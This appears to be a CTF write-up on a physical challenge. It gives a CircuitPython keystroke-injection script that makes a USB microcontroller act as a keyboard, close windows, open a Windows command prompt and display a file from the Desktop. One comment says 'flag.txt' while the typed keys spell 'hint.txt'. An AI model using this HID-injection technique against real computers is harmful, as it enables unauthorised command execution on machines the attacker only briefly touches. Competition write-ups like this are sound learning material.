Writeup OHxY CTF 2024 pt.2 - Challenges Physiques

import time
import board
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keycode import Keycode

keyboard = Keyboard(usb_hid.devices)

# In order to have the time to delete the code.py without running the commands
# if we connect the pico to our computer (for example to change the code.py)
time.sleep(4)

# Closing all tabs
for _ in range(3):
    keyboard.press(Keycode.ALT)
    keyboard.press(Keycode.F4)
    keyboard.release_all()
    time.sleep(0.1)

# Start CMD
keyboard.press(Keycode.WINDOWS)
keyboard.press(Keycode.R)
keyboard.release_all()
time.sleep(3)

keyboard.press(Keycode.C);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.M);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.D);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.ENTER)
keyboard.release_all()
time.sleep(1)

# Write "cd %USERPROFILE%\\Desktop"
keyboard.press(Keycode.C);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.D);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.SPACE);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.SHIFT)
keyboard.press(Keycode.FIVE);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.U);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.S);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.E);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.R);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.P);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.R);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.O);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.F);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.I);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.L);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.E);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.SHIFT)
keyboard.press(Keycode.FIVE);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.BACKSLASH);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.BACKSLASH);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.D);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.E);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.S);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.K);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.O);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.P);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.ENTER);keyboard.release_all();time.sleep(0.1)

# Write "type flag.txt"
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.Y);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.P);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.E);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.SPACE);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.H);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.I);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.N);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.PERIOD);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.X);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.T);keyboard.release_all();time.sleep(0.1)
keyboard.press(Keycode.ENTER)
keyboard.release_all()

# Wait 10 second in order to see the flag
time.sleep(10)

# Closing all tabs
for _ in range(3):
    keyboard.press(Keycode.ALT)
    keyboard.press(Keycode.F4)
    keyboard.release_all()
    time.sleep(0.1)